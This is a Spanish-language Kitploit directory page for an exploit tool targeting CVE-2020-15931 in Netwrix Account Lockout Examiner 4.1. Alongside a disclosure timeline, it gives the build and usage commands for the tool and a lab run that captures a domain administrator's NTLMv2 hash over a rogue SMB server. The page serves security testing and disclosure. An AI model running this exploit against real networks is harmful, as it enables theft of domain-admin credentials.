Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-15931 — Netwrix Account Lockout Examiner 4.1 Vulnerabilidad de divulgación de credenciales de cuenta de administrador de dominio | Kitploit
Herramientas/GitHubGitHub/optiv/cve-2020-15931
Análisis de VulnerabilidadesExplotaciónRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHuboptiv/cve-2020-15931

CVE-2020-15931

Netwrix Account Lockout Examiner 4.1 Vulnerabilidad de divulgación de credenciales de cuenta de administrador de dominio

Ver Repositorio
285hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-15931

Vulnerabilidad de divulgación de credenciales de cuenta de administrador de dominio en Netwrix Account Lockout Examiner 4.1

Resumen de la vulnerabilidad

Netwrix Account Lockout Examiner (ALE) anterior a la versión 5.1 permite que un adversario remoto no autenticado provoque una conexión a un sistema controlado por el atacante y capture el challenge-response NTLMv1/v2 de una cuenta con privilegios de administrador de dominio. La cuenta de administrador de dominio ya estaría configurada con el producto, como se requiere para la instalación. Un adversario puede explotar esto generando un único evento Kerberos Pre-Authentication Failed (Event ID 4771) en un controlador de dominio.

Se pueden encontrar más detalles sobre la vulnerabilidad en el siguiente Blog

image

Créditos

La vulnerabilidad fue descubierta en la naturaleza por Robert Surace (@robsauce) y Daniel Min (@bigb0ss), consultores de seguridad de Optiv, mientras realizaban una evaluación de seguridad. Tras la identificación de CVE-2020-15931, Optiv contactó de inmediato con Netwrix para divulgar la falla identificada de forma responsable.

Cronología de divulgación de la vulnerabilidad

  • 09 de junio de 2020 – Vulnerabilidad descubierta por Optiv
  • 15 de junio de 2020 – Divulgada por Optiv al proveedor
  • 14 de julio de 2020 – El proveedor reconoció el problema y aceptó publicar la versión corregida
  • 23 de julio de 2020 – Divulgada a la CNA (MITRE Corporation)
  • 24 de julio de 2020 – El proveedor publicó la versión corregida de Netwrix Account Lockout Examiner 5.1
  • 24 de julio de 2020 – CVE-2020-15931 asignado por la CNA (MITRE Corporation)
  • 13 de agosto de 2020 – Divulgada al público
  • 30 de octubre de 2020 – Puntuación base 7.5 Alta asignada por NVD (National Vulnerability Database)

Script de explotación

Instalación

El script de explotación fue desarrollado en golang. Instala las siguientes dependencias:

root@kitploit:~
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config

También utiliza el smbserver.py de Impacket.

root@kitploit:~
pip install impacket

Finalmente, descarga el script de explotación y compílalo.

root@kitploit:~
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go

Uso

root@kitploit:~
$  ./cve-2020-15931

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

 
    Required:
    -d            Domain name
    -dc           Domain controller 
    -u            Valid username 
    
    Optional:
    -h            Print this help menu

    Example:
    ./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith

Explotación

(Nota: En el momento de redactar este documento, este ataque solo puede identificarse mediante un ataque basado en ciegas. Esto se debe a que es difícil determinar si la organización objetivo utiliza Netwrix Account Lockout Examiner en su red para auditar las autenticaciones de cuentas o no.)

root@kitploit:~
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

[+] DC: 	10.10.0.2
[+] Domain: 	bosslab.com
[+] Username: 	b0ss1
[+] Password: 	wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...

Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []

Referencias

Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client
CVE-2020-15931

Descargar herramienta